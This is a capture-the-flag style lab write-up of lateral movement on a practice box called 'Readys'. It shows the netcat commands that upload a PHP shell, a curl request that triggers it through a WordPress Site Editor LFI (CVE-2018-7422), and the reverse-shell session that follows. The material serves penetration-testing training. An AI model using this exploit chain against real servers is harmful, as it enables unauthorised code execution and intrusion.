InfoSec LAB

Readys_Lateral_Movement_Alice

Created: 4 min read

LFI

Upon many trials and errors, it has been concluded that obtaining the password of the alice user is impossible.

redis@readys:~$ ll /var/www/html
total 224K
4.0K drwxr-xr-x  5 alice alice 4.0K Mar 31 06:25 .
4.0K drwxr-xr-x  7 alice alice 4.0K Mar 31 06:25 wp-content
8.0K -rw-r--r--  1 alice alice 7.2K Nov 16  2021 readme.html
4.0K -rw-r--r--  1 alice alice 3.3K Nov 16  2021 wp-load.php
 24K -rw-r--r--  1 alice alice  21K Nov 16  2021 wp-settings.php
 32K -rw-r--r--  1 alice alice  31K Nov 16  2021 wp-signup.php
4.0K -rw-r--r--  1 alice alice  405 Nov 16  2021 index.php
 20K -rw-r--r--  1 alice alice  20K Nov 16  2021 license.txt
4.0K -rw-r--r--  1 alice alice  351 Nov 16  2021 wp-blog-header.php
 12K drwxr-xr-x 25 alice alice  12K Nov 16  2021 wp-includes
4.0K -rw-r--r--  1 alice alice 2.5K Nov 16  2021 wp-links-opml.php
4.0K -rw-r--r--  1 alice alice 2.3K Nov 16  2021 wp-comments-post.php
4.0K -rw-r--r--  1 alice alice 3.2K Nov 16  2021 wp-config.php
 44K -rw-r--r--  1 alice alice  44K Nov 16  2021 wp-login.php
8.0K -rw-r--r--  1 alice alice 7.0K Nov 16  2021 wp-activate.php
4.0K -rw-r--r--  1 alice alice 2.9K Nov 16  2021 wp-config-sample.php
 12K -rw-r--r--  1 alice alice 8.4K Nov 16  2021 wp-mail.php
8.0K -rw-r--r--  1 alice alice 4.7K Nov 16  2021 wp-trackback.php
4.0K -rw-r--r--  1 alice alice  523 Nov 16  2021 .htaccess
4.0K drwxr-xr-x  9 alice alice 4.0K Nov 16  2021 wp-admin
4.0K -rw-r--r--  1 alice alice 3.9K Nov 16  2021 wp-cron.php
4.0K -rw-r--r--  1 alice alice 3.2K Nov 16  2021 xmlrpc.php
4.0K drwxr-xr-x  3 root  root  4.0K Nov 16  2021 ..
 
 
redis@readys:~$ cat /etc/apache2/apache2.conf | grep -v '^[#/*]'
DefaultRuntimeDir ${APACHE_RUN_DIR}
PidFile ${APACHE_PID_FILE}
Timeout 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 5
User alice
Group alice
HostnameLookups Off
ErrorLog ${APACHE_LOG_DIR}/error.log
LogLevel warn
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
Include ports.conf
<Directory />
    Options FollowSymLinks
    AllowOverride None
    Require all denied
</Directory>
 
<Directory /usr/share>
    AllowOverride None
    Require all granted
</Directory>
 
<Directory /var/www/>
    Options Indexes FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>
 
AccessFileName .htaccess
<FilesMatch "^\.ht">
    Require all denied
</FilesMatch>
 
 
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
IncludeOptional conf-enabled/*.conf
IncludeOptional sites-enabled/*.conf

However, I have realized that the target WordPress instance is running as the alice user. This could be further confirmed by checking the Apache configuration as well as the web root directory.

Considering that the target WordPress instance suffers from the LFI vulnerability(CVE-2018-7422), and an interactive session is established to the system, it would be possible to achieve remote code execution by directly uploading a malicious PHP file onto the target system, and subsequently invoking it through the LFI vulnerability. By exploiting this flaw, arbitrary code can be executed on the system.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ nc -vn $IP 2222 < shell.php
(UNKNOWN) [192.168.154.166] 2222 (?) open
 
 
redis@readys:/dev/shm$ nc -nlvp 2222 > shell.php
listening on [any] 2222 ...
connect to [192.168.154.166] from (UNKNOWN) [192.168.45.218] 52316

Delivery complete

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ curl http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/dev/shm/shell.php

Invoking the shell.php file via LFI

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ nnc 6666                   
listening on [any] 6666 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.154.166] 34850
SOCKET: Shell has connected! PID: 14127
whoami
alice
hostname
readys
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.154.166  netmask 255.255.255.0  broadcast 192.168.154.255
        inet6 fe80::250:56ff:fe9e:6966  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:9e:69:66  txqueuelen 1000  (Ethernet)
        RX packets 62328  bytes 5426812 (5.1 MiB)
        RX errors 0  dropped 262  overruns 0  frame 0
        TX packets 57386  bytes 7784347 (7.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 45  bytes 4582 (4.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 45  bytes 4582 (4.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Lateral Movement made to the alice user via LFI

Interactive Graph View

Backlinks